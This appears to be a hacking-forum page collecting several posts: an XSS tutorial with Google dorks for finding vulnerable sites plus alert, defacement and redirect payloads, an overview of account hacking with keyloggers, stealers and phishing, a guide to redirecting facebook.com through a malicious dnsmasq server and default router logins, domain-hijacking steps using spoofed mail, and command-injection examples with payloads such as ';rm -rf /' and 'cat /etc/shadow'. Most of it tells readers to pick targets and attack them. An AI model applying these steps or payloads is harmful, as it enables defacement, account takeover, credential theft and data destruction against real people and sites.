[TUT] Cross Site Scripting ( XSS )Tutorial

hey Guys I'm just sharing a simple XSS Tutorial that i found informative. I hope it'll be helpfull. 
Cross-site scripting (XSS) is a type of website security vulnerability typically found in web applications that enables client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy.

Types of XSS vulnerabilities:

1.Persistent
2.Non persistent

In this post, i'll explain about the non persistent vulnerability. On Persistent i'll write later.
Non persistent XSS vulnerability is the Most Common Type of XSS Flaw. It is a Server Side Vulnerability
When a Web Server takes any input from a User and returns the same back to the User without any Validation, This leads to a Non-Persistent XSS Vulnerability.

Attacker can do with XSS:

XSS Attacks be used for the following:

•Compromising and Hijacking Accounts
•Stealing User Cookies
•Defacing Websites
•Phishing Attacks
•Posting Hostile Content


Instructions:
Step 1: First of all find the vulnerablitiy using google dorks. You can find dorks online.
Most commonly used dorks are as follow:
Code:
inurl:com_feedpostold/feedpost.php?url=
inurl:/products/orkutclone/scrapbook.php?id=
inurl:/products/classified/headersearch.php?sid=
inurl:/poll/default.asp?catid=
inurl:/search_results.php?search=Search&k=
Step 2: Choose a target website.

Step 3: Attack..

Find out the vulnerability:

1)Find a textbox in the site or something where you can submit text.


2)Type in the following and hit Submit Query button.


Code:
<script>alert("Pakbugs.com");</script>


3)If webpage will give a popUp with message "Pakbugs.com".


Defacing:

There are few ways which can be used to deface a site when you find a XSS vulnerability.


1) Makes A Picture Pop-Up:


Code:
<script>location="www.website.com/yourdefacepic";</script>


2) Replace The Content Of The Page By An Image:


Code:
<img src="yoursite.com/yourdefacepic/>


3)Redirect To A Website


Code:
<script>window.location="http://www.yoursite.com"</script>

You've done all.. Hope i'll help you great.

Read More

[Article] Introduction to Hacking Email or Website Accounts.

You CANNOT hack emails or websites with just one or two clicks with some email hacking apps. You need to have proper information about the person that you are hacking. If you see sites that claim that they can hack email accounts within minutes and charge hundreds of dollars for it, just laugh at them and move on. Do not waste money on them as they will be just scamming you. 

There are two ways to hack Accounts of a Website.

Client Side Hacking

This method can be done depending what you choose. Client side hacking is basically hacking the person's pc and extract information. Antiviruses will detect the apis, assemblies, etc and prevent you from infecting them. In this case you need

1) Keylogging : This basically taps all the keystrokes that users type. When user types password you get it. The victim requires to execute the keylogger "server" file in order to be infected. 

2) Password Stealing : Here you steal password saved on user's pc. Browsers often save passwords to provide quick login to the user, but this can be harmful sometimes. Here same as keyloggers you need to execute a file on client pc. You can use combination of keylogger and password stealers, such as my Emissary Keylogger/Stealer.

3) Cookie Stealing : Here you are stealing cookies of the user. Cookies can be used to auto login as they hold information about the account. 

4) Remote Administration Tools : These tools are very dangerous and give you full control of a computer. You can view webcams, desktops live, transfer and download files. 

5) Social Engineering : Social Engineering is nothing but fooling someone to download your malware or extracting sensitive information from them.
One of the methods is this : Hacking Accounts through SE.


6) Phishing Attacks : Phishing is creating fake login pages similar to that of a website's login page and then fooling the person to enter their username and password into the login box. The triggered php scripts shall send the entered passwords to your log file.

7) Zombies/Bots : This is like keylogging and pass stealing if victim executes your malware he she can be infected with a bot. A bot will connect them to your irc channel or host server and make them your "Zombie". You can do whatever you want with them.

That covers the client part. 


Server Side Hacking


1) Exploiting : Exploiting means finding a vulnerability and using it to your advantage. There are various publically disclosed vulnerabilities and exploits that you can simply search on google and HC. There are ways to exploit a server the most common ones are

1) XSS Cross Site Scripting,
2) RFI, LFI 
3) Uploading Shells
4) SQL Injections
5) CSRF 
6) Gaining Root Access to websites hosted on the same server and then intruding another site on the server.
7) Using Scripts to gain information known as Exploits.

These methods are very vast and cannot be explained in a few lines so I am not explaining them in this guide.


2) Bruteforce Attack : Bruteforcing is using a bruteforcer software to try combinations of words, numbers and symbols to fetch the login of your victim. But this rarely works and you need to have a powerful computer. 

3) Reverting Accounts : Here we are fooling the website servers that we are the authorized user and we are the holder of an account. One of this vulnerability exists in Hotmail and existed in Facebook. Users just supplied some information about the clients such as last accessed ip address, contacts on contact list, date of birth, location, etc. With a bit of SE its not that hard to extract such information from the client.

That covers most of the basics of Email/Website Account "Hacking". Hope you don't buy into any of the bullshit after reading this guide.      

LOVE YOU ALL <3

Read More

[TUT] DNS Spoofing On Linux (Local Machine) Tutorial

This is an introduction to DNS poisoning which also includes an example of quite a nifty application of it using the IP Experiment. It’s purely educational, so I’m not responsible for how you use the information in it.
To start, you’ll need
• A computer running Linux (Ubuntu in my case)
• A basic understanding of how the Domain Name System (DNS) works.
Note that this is a more advanced topic; don’t try this if you don’t know what you’re doing.


Why DNS?


The DNS provides a way for computers to translate the domain names we see to the physical IPs they represent. When you load a webpage, your browser will ask its DNS server for the IP of the host you requested, and the server will respond. Your browser will then request the webpage from the server with the IP address that the DNS server supplied.
If we can find a way to tell the client the wrong IP address, and give them the IP of a malicious server instead, we can do some damage.


Malicious DNS Server


So if we want to send clients to a malicious web server, first we need to tell them its IP, and so we need to set up a malicious DNS server.
The server I’ve selected is dnsmasq – its lightweight and the only one that works for this purpose (that I’ve found)
To install dnsmasq on Ubuntu, run sudo apt-get install dnsmasq, or on other distributions of Linux, use the appropriate package manager.


Once you’ve installed it you can go and edit the configuration file (/etc/dnsmasq.conf)


sudo gedit /etc/dnsmasq.conf


The values in there should be sufficient for most purposes. What we want to do is hard-code some IPs for certain servers we want to spoof


The format for this is address=/HOST/IP


So for example;


address=/facebook.com/63.63.63.63


where 63.63.63.63 is the IP of your malicious web server


Save the file and restart dnsmasq by running


sudo /etc/init.d/dnsmasq restart


You now have a DNS server running which will redirect requests for facebook.com to 63.63.63.63


Malicious Web Server


You probably already have a web server installed. If not, install apache. This is pretty basic, so I won’t cover it here.


There are a couple of things you can do with the web server. It will be getting all the traffic intended for the orignal website, so the most likely cause of action would be to set up some sort of phishing site


I’ll presume you know how to do that though


Another alternative is to set up some sort of transparent proxy which logs all activity. I might come back to this in the future.


I Can Be Your DNS Server Plz?


An alternative is to, instead of a spoof webserver, set up a Metasploit browser_autopwn module . You can have lots of fun with that


But how do you get a Slave? Well this is where my project, the IP Experiment could come in handy


If you don’t know, the IP Experiment basically harvests people’s IPs through websites such as forums and scans them for open ports. A surprising number of these IPs have port 80 open and more often that not, that leads straight to a router configuration mini-site. ‘Admin’ and ‘password’ will get you far in life; its fairly easy to login and change the DNS settings.

LOVE YOU ALL <3

Read More

[Article] Website Hacking Techniques

1) What is Website defacement ?

A website defacement is an attack on a website that changes the visual appearance of the site. These are typically the work of system crackers, who break into a web server and replace the hosted website with one of their own.

A high-profile website defacement was carried out on the website of the company SCO Group following its assertion that Linux contained stolen code. The title of the page was changed from "Red Hat vs SCO" to "SCO vs World," with various satirical content following

2) Terms to be used ---->

[SQL] - Structured Query Language
[LFI] - Local File Include
[RFI] - Remote File Include
[XSS] - Cross Site Scripting
[RCE] - Remote Code Execution
[AFD] - Arbitrary File Download
[SCD] - Source Code Disclosure
[PCI] - PHP Code Injection

3) Defacement techniques ?

I).Domain Hacking
II).FTP Protocol
III).Apache Vulnerable
IV).Script, Cookie, XSS
V).Social Engineering.
VI).SQL Injection
VII).RFI.


Now :-

I) What is Domain Hacking ?

A Domain hacking is a process to transfer domain(yahoo.com) without owner permission with help of phishing, sniffing,spoofing.

A domain hack is an unconventional domain name that combines domain levels, especially the top-level domain (TLD), to spell out the full "name" or title of the domain, making a kind of fun.


------->Domain Hacking process :--->

a) See who.is record of Slave(XXABCXX.net) DNS record and note
down admin email (xxabcxx@gmail/ymail/hotmail/live/[whatever apply this exception if possible admin(name)@XXABCXX.net] )
b) Send spoof mail to Slave admin email for password.
c) after open domain registrar ---->(my.india s.com)
<-----------website to access
their domain control panel (click forget password)
d) After you get a password in Slave email address of Slave domain.
e) Just login on domain control panel.
f) and get ECCP code and create new account on hosting company
and choose Domain transfer (all submit all details)
g) You will get all rights on this domain for lifetime.



II) What is FTP Protocol ?

The File Transfer Protocol (FTP) provides the basic elements of file sharing between hosts. FTP uses TCP to create a virtual connection for control information and then creates a separate TCP connection for data transfers. The control connection uses an image of the TELNET protocol to exchange commands and messages between hosts.
for detail check this Detail about FTP

III) What is XSS ?

XSS is a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users.
Cross Site Scripting is a technique used to add script to a trusted site that will be executed
on other users browsers. A key element to XSS is that one user can submit data to a
website that will later be displayed for other users. It is nessesary that the bad guy NOT
mess up the HTML structure, otherwise the result will be web defacement rather then
attacking other users.

IV) What is Social Engineering ?

Social engineering is the act of manipulating people into doing actions or exposing confidential information. It's trickery or deception to gather information, fraud, or computer system access
where in the hacker never comes face-to-face with the Slave. Here are
I don't want to make my thread so big in size so i helped myself by
LINK

V) What is SQL injection ?

SQL injection is a type of security exploit in which the attacker
injects Structured Query Language (SQL) code through a web form input box, to gain access to resources, or make changes to data.
It is a technique of injecting SQL commands to exploit non-validated input vulnerabilities in a web application database.

-------------->Preventing SQL Injection<-------------------
To protect against SQL injection, user input must not directly be embedded in SQL statements. Instead, parameterized statements must be used (preferred), or user input must be carefully escaped or filtered.

VI) What is RFI ?

Remote File Inclusion attacks allow malicious users to run their own PHP code on a vulnerable website. The attacker is allowed to include his own (malicious) code in the space provided for PHP programs on a web page.

love you all <3

Read More

[TUT] Command Injection Tutorial

The purpose of the command injection attack is to inject and execute commands specified by the attacker in the vulnerable application. In situation like this, the application, which executes unwanted system commands, is like a pseudo system shell, and the attacker may use it as any authorized system user. However, commands are executed with the same privileges and environment as the application has. Command injection attacks are possible in most cases because of lack of correct input data validation, which can be manipulated by the attacker (forms, cookies, HTTP headers etc.).

There is a variant of the Code Injection attack. The difference with code injection is that the attacker adds his own code to the existing code. In this way, the attacker extends the default functionality of the application without the necessity of executing system commands. Injected code is executed with the same privileges and environment as the application has.

An OS command injection attack occurs when an attacker attempts to execute system level commands through a vulnerable application. Applications are considered vulnerable to the OS command injection attack if they utilize user input in a system level command. 

Example 1

The following code is a wrapper around the UNIX command cat which prints the contents of a file to standard output. It is also injectable:


#include <stdio.h>
#include <unistd.h>

int main(int argc, char **argv) {
char cat[] = "cat ";
char *command;
size_t commandLength;

commandLength = strlen(cat) + strlen(argv[1]) + 1;
command = (char *) malloc(commandLength);
strncpy(command, cat, commandLength);
strncat(command, argv[1], (commandLength - strlen(cat)) );

system(command);
return (0);
}

Used normally, the output is simply the contents of the file requested:


$ ./catWrapper Story.txt
When last we left our heroes...

However, if we add a semicolon and another command to the end of this line, the command is executed by catWrapper with no complaint:

$ ./catWrapper "Story.txt; ls"
When last we left our heroes...
Story.txt doubFree.c nullpointer.c
unstosig.c www* a.out*
format.c strlen.c useFree*
catWrapper* misnull.c strlength.c useFree.c
commandinjection.c nodefault.c trunc.c writeWhatWhere.c

If catWrapper had been set to have a higher privilege level than the standard user, arbitrary commands could be executed with that higher privilege.
Example 2

The following simple program accepts a filename as a command line argument, and displays the contents of the file back to the user. The program is installed setuid root because it is intended for use as a learning tool to allow system administrators in-training to inspect privileged system files without giving them the ability to modify them or damage the system.

int main(char* argc, char** argv) {
char cmd[CMD_MAX] = "/usr/bin/cat ";
strcat(cmd, argv[1]);
system(cmd);
}

Because the program runs with root privileges, the call to system() also executes with root privileges. If a user specifies a standard filename, the call works as expected. However, if an attacker passes a string of the form ";rm -rf /", then the call to system() fails to execute cat due to a lack of arguments and then plows on to recursively delete the contents of the root partition.
Example 3

The following code from a privileged program uses the environment variable $APPHOME to determine the application's installation directory, and then executes an initialization script in that directory.

...
char* home=getenv("APPHOME");
char* cmd=(char*)malloc(strlen(home)+strlen(INITCMD));
if (cmd) {
strcpy(cmd,home);
strcat(cmd,INITCMD);
execl(cmd, NULL);
}
...

As in Example 2, the code in this example allows an attacker to execute arbitrary commands with the elevated privilege of the application. In this example, the attacker can modify the environment variable $APPHOME to specify a different path containing a malicious version of INITCMD. Because the program does not validate the value read from the environment, by controlling the environment variable, the attacker can fool the application into running malicious code.

The attacker is using the environment variable to control the command that the program invokes, so the effect of the environment is explicit in this example. We will now turn our attention to what can happen when the attacker changes the way the command is interpreted.
Example 4

The code below is from a web-based CGI utility that allows users to change their passwords. The password update process under NIS includes running make in the /var/yp directory. Note that since the program updates password records, it has been installed setuid root.

The program invokes make as follows:

system("cd /var/yp && make &> /dev/null");

Unlike the previous examples, the command in this example is hardcoded, so an attacker cannot control the argument passed to system(). However, since the program does not specify an absolute path for make, and does not scrub any environment variables prior to invoking the command, the attacker can modify their $PATH variable to point to a malicious binary named make and execute the CGI script from a shell prompt. And since the program has been installed setuid root, the attacker's version of make now runs with root privileges.

The environment plays a powerful role in the execution of system commands within programs. Functions like system() and exec() use the environment of the program that calls them, and therefore attackers have a potential opportunity to influence the behavior of these calls.

There are many sites that will tell you that Java's Runtime.exec is exactly the same as C's system function. This is not true. Both allow you to invoke a new program/process. However, C's system function passes its arguments to the shell (/bin/sh) to be parsed, whereas Runtime.exec tries to split the string into an array of words, then executes the first word in the array with the rest of the words as parameters. Runtime.exec does NOT try to invoke the shell at any point. The key difference is that much of the functionality provided by the shell that could be used for mischief (chaining commands using "&", "&&", "|", "||", etc, redirecting input and output) would simply end up as a parameter being passed to the first command, and likely causing a syntax error, or being thrown out as an invalid parameter.
Example 5

The following trivial code snippets are vulnerable to OS command injection on the Unix/Linux platform:

C: 

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
char command[256];

if(argc != 2) {
printf("Error: Please enter a program to time!\n");
return -1;
}

memset(&command, 0, sizeof(command));

strcat(command, "time ./");
strcat(command, argv[1]);

system(command);
return 0;
}

If this were a suid binary, consider the case when an attacker enters the following: 'ls; cat /etc/shadow'. In the Unix environment, shell commands are separated by a semi-colon. We now can execute system commands at will! 

Java: 

There are many sites that will tell you that Java's Runtime.exec is exactly the same as C's system function. This is not true. Both allow you to invoke a new program/process. However, C's system function passes its arguments to the shell (/bin/sh) to be parsed, whereas Runtime.exec tries to split the string into an array of words, then executes the first word in the array with the rest of the words as parameters. Runtime.exec does NOT try to invoke the shell at any point. The key difference is that much of the functionality provided by the shell that could be used for mischief (chaining commands using "&", "&&", "|", "||", etc, redirecting input and output) would simply end up as a parameter being passed to the first command, and likely causing a syntax error, or being thrown out as an invalid parameter. 


Remember me In your prayers <3

Read More